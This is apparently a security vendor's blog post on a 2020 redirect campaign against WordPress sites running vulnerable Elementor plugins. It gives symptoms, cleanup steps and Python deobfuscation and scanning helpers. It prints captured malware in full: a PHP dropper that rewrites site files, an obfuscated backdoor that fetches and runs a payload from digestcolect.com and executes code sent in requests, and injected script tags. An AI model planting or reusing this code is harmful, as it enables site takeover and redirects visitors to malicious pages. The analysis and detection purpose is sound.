Targeted Redirection Attacks to Digestcolect .com in WordPress Websites – Linked To Vulnerabilities in Elementor Pro

Updated on: May 30, 2020

Attacks targeting vulnerabilities in WordPress themes and plugins have only intensified in the past few months. The ongoing attack campaign against the WordPress plugins Elementor Pro and Ultimate Addons for Elementor and the Astra theme appears to have taken a new turn, with redirection hacks surfacing that send visitors to questionable websites such as digestcolect [.] com and track[.]developfirstline[.]com/t.js?s=5.

Both Elementor and Ultimate Addons for Elementor have released updates that patch these security issues, so update to the following versions if you have not done so already:

  • Elementor Pro: 2.9.4
  • Ultimate Addons for Elementor: 1.24.2

What We Know So Far

The most common symptom shown by the affected websites is redirection.

That said, there are other symptoms as well that hint at the attack:

  1. Gibberish files added to the website root directory
  2. Unauthorised admin users added to the WordPress admin area
  3. Unknown files and folders in /wp-content/uploads/elementor/custom-icons/
  4. Unknown files in the website root such as wp-xmlrpc.php and wp-cl-plugin.php
  5. Thousands of unknown malicious JavaScript and PHP files added to the file system
Redirection JavaScript insert attempts being blocked by Astra’s firewall

What Does Malicious ‘tap.digestcolect.com/r.php?id=0 spam/’ Website Redirection Code Look Like?

  • The following code was found in a file named ‘hjghjerg’:
<?php
// Dropper entry point: re-run the file walk at most once every 6400 seconds,
// using ./debugs.log as the last-run timestamp
$lastRunLog = "./debugs.log";
if (file_exists($lastRunLog)) {
    $lastRun = file_get_contents($lastRunLog);
    if (time() - $lastRun >= 6400) {
        search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../", "index");
        search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../", ".js");
        file_put_contents($lastRunLog, time());
    }
} else {
    search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../", "index");
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../", ".js");
    file_put_contents('./debugs.log', time());
}

function search_file($dir, $file_to_search) {
    $files = @scandir($dir);
    if ($files == false) {
        // Directory not readable: drop one "../" from the path and retry
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            @search_file($dir, "index");
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT']."/") {
            @search_file($dir, "index");
            return;
        }
    }

...

function search_file_js($dir, $file_to_search) {
    $files = @scandir($dir);
    if ($files == false) {
        // Directory not readable: drop one "../" from the path and retry
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            @search_file_js($dir, ".js");
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT']."/") {
            @search_file_js($dir, ".js");
            return;
        }
    }
    // Recurse into every readable directory and rewrite each *.js file found
    foreach ($files as $key => $value) {
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
        if (!is_dir($path)) {
            if (strpos($value, $file_to_search) !== false && (strpos($value, ".js") !== false)) {
                make_it_js($path);
            }
        } else if ($value != "." && $value != "..") {
            search_file_js($path, $file_to_search);
        }
    }
}

function make_it_js($f) {
    $g = file_get_contents($f);
    // Only touch files that look like real scripts, and only once:
    // 'mndfhghjf' is the marker left behind by an earlier injection
    if (strpos($g, 'var') !== false) {
        $g = file_get_contents($f);
        if (strpos($g, 'mndfhghjf') !== false) {
        } else {
            $l2 = "";   // prepended to the file; empty in the sample as published
            $g = file_get_contents($f);
            $g = $l2.$g;
            @system('chmod 777 '.$f);   // make the file world-writable before overwriting it
            @file_put_contents($f, $g);
            $g = file_get_contents($f);
            if (strpos($g, 'mndfhghjf') !== false) {
            }
        }
    }
}

function make_it($f) {
    $g = file_get_contents($f);
    // 'trackstatisticsss' is the marker for already-infected PHP/index files
    if (strpos($g, 'trackstatisticsss') !== false) {
    } else {
        $l2 = "";   // prepended to the file; empty in the sample as published
        $g = $l2.$g;
        @system('chmod 777 '.$f);
        @file_put_contents($f, $g);
        $g = file_get_contents($f);
        if (strpos($g, 'trackstatisticsss') !== false) {
        }
    }
}

  • This piece of code was found inside the file header.php:
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; 
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); 
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104);
 @file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1); ?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).

..

chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; 	$z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); 	$z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); 	$z3 = $b2($_REQUEST[chr(100).chr(49)]); 	@$n3($a,$z2); 	@include($a);@unlink($a); 	$a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); 	@include($a);@unlink($a);die();  } ?><?php if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];}  function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}$_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));if(!empty($_1)){$_1=str_rot13(@pack(_1896550334(4),strrev($_1)));if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}}else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}die();} ?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>
  • This code was found in some core theme files:
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
Malicious code behind the digestcolect [.] com spam redirect, as flagged by Astra’s malware scanner
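
To understand what the header.php sample does without ever executing it, the chr() chains can be folded back into plain strings. The Python helper below is an added example written for this article, not code from the post or from the malware; the constructed SAMPLE is the first four statements of the header.php sample copied from above, and resolving them reveals the function names and the URL of the payload the dropper fetches from css.digestcolect.com.

```python
import re

# Constructed sample: the opening statements of the header.php dropper quoted in
# the post, copied as they appear there (PHP chr() chains joined with ".").
SAMPLE = r'''<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode";
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115);
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104);'''

# One piece is either chr(N) or a plain double-quoted literal (no escapes occur here).
PIECE = re.compile(r'chr\((\d+)\)|"([^"\\]*)"')
# A chain is one or more pieces glued together with PHP's "." concatenation operator.
CHAIN = re.compile(r'(?:chr\(\d+\)|"[^"\\]*")(?:\s*\.\s*(?:chr\(\d+\)|"[^"\\]*"))*')


def resolve_chain(chain: str) -> str:
    """Evaluate a single chr()/literal chain to the plain string it builds."""
    parts = []
    for m in PIECE.finditer(chain):
        parts.append(chr(int(m.group(1))) if m.group(1) is not None else m.group(2))
    return "".join(parts)


def deobfuscate(php: str) -> str:
    """Rewrite every chain in the PHP source as one readable double-quoted literal."""
    def repl(m: re.Match) -> str:
        s = resolve_chain(m.group(0)).replace("\\", "\\\\").replace('"', '\\"')
        return f'"{s}"'
    return CHAIN.sub(repl, php)


def hidden_strings(php: str) -> list[str]:
    """List the strings the chains conceal, in source order: function names, URLs, parameter names."""
    return [resolve_chain(m.group(0)) for m in CHAIN.finditer(php)]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print("Remote payload URLs:", [s for s in hidden_strings(SAMPLE) if s.startswith("http")])
```

The decoded form shows the sample building `base64_decode` and `file_get_contents`, pulling a base64 payload from the digestcolect host, writing it to a file named `h` with a `<?php ` prefix, including it and deleting it; the same helper applied to the rest of the snippet exposes the request parameter names the backdoor keys on.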

How to Fix the Digestcolect [.] com Redirect?

If your website is redirecting or showing other symptoms of the hack, you can quicken your incident response by doing the following:

  1. Start by checking the files hackers most often target, such as functions.php, wp-config.php and index.php
  2. Compare the core WordPress files from an official release with the ones on your server to check whether core files have been modified
  3. Scan your website with an online malware scanner
  4. Check the database for unfamiliar admins and users
  5. Check your root directory for gibberish files
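
Steps 3 and 5 can be partly automated for this particular campaign. The Python script below is an added example, not code from the post or from Astra's scanner: it walks a site tree and flags the indicators the samples in this post expose (script tags loading from digestcolect.com, the 'mndfhghjf' and 'trackstatisticsss' markers, the dropper's debugs.log, dense chr() chains, and world-writable PHP or JS, which the dropper leaves behind via chmod 777). It is exercised on a constructed temporary directory; the paths, names and contents in build_sample_site are made up for the demo.

```python
import re
import stat
import tempfile
from pathlib import Path

# Indicators taken from the samples quoted in the post: the host the injected <script>
# tags load from, the marker strings the dropper checks before re-injecting a file,
# its run-timestamp file, and its chr()-chain obfuscation.
INDICATORS = {
    "digestcolect_script_tag": re.compile(r"<script[^>]*src=['\"]https?://[\w.-]*digestcolect\.com/", re.I),
    "reinfection_marker": re.compile(r"mndfhghjf|trackstatisticsss"),
    "chr_chain_obfuscation": re.compile(r"(?:chr\(\d+\)\s*\.\s*){8,}"),
}
TIMESTAMP_FILE = "debugs.log"

def scan_tree(root: str) -> list[tuple[str, str]]:
    """Return sorted (relative path, indicator) pairs for every file that trips an indicator."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name == TIMESTAMP_FILE:
            findings.append((rel, "dropper_timestamp_file"))
        # The dropper does `chmod 777` on each file it rewrites: a cheap secondary signal.
        if path.suffix in (".php", ".js") and path.stat().st_mode & stat.S_IWOTH:
            findings.append((rel, "world_writable"))
        text = path.read_text(errors="replace")
        findings.extend((rel, name) for name, rx in INDICATORS.items() if rx.search(text))
    return sorted(findings)

def build_sample_site() -> str:
    """Constructed mini site in a temp dir: one clean file plus one file per indicator."""
    root = tempfile.mkdtemp()
    samples = {
        "index.php": "<?php echo 'clean'; ?>",
        "wp-content/themes/demo/header.php": "<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>",
        "hjghjerg": "<?php if (strpos($g, 'mndfhghjf') !== false) { } ?>",
        "debugs.log": "1590000000",
        "wp-content/uploads/elementor/custom-icons/x.php": "<?php $c = " + ".".join(f"chr({ord(ch)})" for ch in "base64_decode") + "; ?>",
    }
    for rel, content in samples.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    Path(root, "wp-content/uploads/elementor/custom-icons/x.php").chmod(0o777)
    return root

if __name__ == "__main__":
    for rel, indicator in scan_tree(build_sample_site()):
        print(f"{indicator:26} {rel}")
```

Point scan_tree at a real document root to triage a suspected site; a hit on any content indicator is grounds for restoring that file from a clean copy rather than editing it in place.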

You can follow our WordPress redirection removal guide for a more thorough malware removal or follow this step-by-step tutorial for the same.

If the redirection still persists, it is quite possible that hackers have also injected backdoors on your website. This usually requires an in-depth malware scan with code review to clean the website.

Not infected? Secure Your Website

You were lucky to dodge this exploit, but don’t leave it to chance. It’s better to secure your website now. A premium firewall like Astra Security goes a long way in securing your website with 24×7 monitoring and protection from attacks such as JS injection, SQLi, CSRF, XSS, bad bots, RFI, LFI and a hundred others.

How does the Astra Firewall work?

With a multitude of additional security tools such as the Malware Scanner, Country Blocking and IP blocking, Astra Security makes security a cakewalk for businesses and blogs alike.

Need professional help to prevent your WordPress site from being hacked? Drop us a message on the chat widget, and we’d be happy to help you.

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines and others for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at the Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) and French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he’s building an intelligent security ecosystem: web application firewall (WAF), malware detection & analysis, large-scale SaaS applications, APIs and more. He’s actively involved in the cybersecurity community and has shared his knowledge at various forums and invited talks.

16 Comments
James D. Schreiber
6 days ago

Hi, can you tell me about WordPress backdoor hacks and how I can defend against this happening to me?

Sai Krishna
Editor
6 days ago

Hi James! A WordPress backdoor is the code which allows an attacker unauthorized and persistent access to the server. Often it is a malicious file hidden somewhere. Therefore, the threat could be from anywhere. Later on, it can be a time and resource consuming process to remove WordPress backdoors. For more info, visit here: https://www.getastra.com/blog/911/wordpress-backdoor-hack/

M. Ament
6 days ago

Hello, what features does the Astra firewall offer along with the scanner for WordPress security, and can you provide more info on pricing and details?

Sai Krishna
Editor
6 days ago
Reply to M. Ament

Hi Ament! Thanks for responding to the article. You can visit here for features and more information about the Astra firewall: https://www.getastra.com/wordpress-firewall and for pricing visit here: https://www.getastra.com/pricing

Richard S
6 days ago

Hi Astra, my WordPress website is showing some strange Japanese content in Google search. Is my website hacked? If yes, how can I solve it?

Sai Krishna
Editor
6 days ago
Reply to Richard S

Thanks for responding to the article. In a Japanese keyword hack, auto-generated Japanese text starts to appear on your site. This particular black-hat SEO technique hijacks Google search results by displaying Japanese words in the title and description of the infected pages. It happens when different web pages are shown to search engines and normal visitors. For more information on removal visit here: https://www.getastra.com/blog/911/japanese-keyword-hack/

Wysong
6 days ago

Hello, how can I fix the redirection hack of WordPress? I have a site which is redirecting to strange websites and I want to fix it myself.

Sai Krishna
Editor
6 days ago
Reply to Wysong

Hi Wysong! Thanks for responding to the article. A WordPress malware redirect hack is a common form of attack where the visitors to the infected website are automatically redirected to phishing sites or malicious websites. For more information visit here: https://www.getastra.com/blog/911/wordpress-redirect-hack/

B. Foster
6 days ago

Hi there, I have a query. Is there any chance that hackers upload files using a file manager that affects website performance?

Sai Krishna
Editor
6 days ago
Reply to B. Foster

Hi Foster! Yes, malicious file uploaders allow hackers to upload .php files, etc., to the server, which could be used to further infect the site. The consequences could include complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement.

Paul M. Kelly
6 days ago

Hey, I think my database has some infected files. In which tables can I possibly find them? It’s a WordPress site.

Sai Krishna
Editor
6 days ago
Reply to Paul M. Kelly

Hi Paul! Sorry to hear that. For any WordPress website, the database is the biggest asset. It stores all the crucial information of a website i.e. user info, site URLs, posts, pages, comments, custom fields, etc. An improperly secured WordPress database is like an open invitation to hackers. For more info, visit here: https://www.getastra.com/blog/911/how-to-secure-wordpress-database/

Catherine
6 days ago

Hi there, can you tell me about those common files that have a high chance of getting hacked? I own a website running on WordPress.

Sai Krishna
Editor
6 days ago
Reply to Catherine

Hi Catherine! Thanks for responding to the article. You can go through this article to know more about the common files that get hacked and how to protect them: https://www.getastra.com/blog/911/wordpress-files-hacked-wp-config-php-hack/

Miller K. Joe
6 days ago

Hey can you tell me more about the features that Astra firewall comes with? I would like to know more before opting for it 🙂

Sai Krishna
Editor
6 days ago
Reply to Miller K. Joe

Hi Miller! Thanks for responding to the article and also for showing interest in Astra. You don’t have to worry about any malware, credit card hack, SQLi, XSS, SEO spam, comment spam, brute force & 100+ types of threats. This means you can get rid of other security plugins & let Astra take care of it all. You can find more info about features and more here: https://www.getastra.com/features
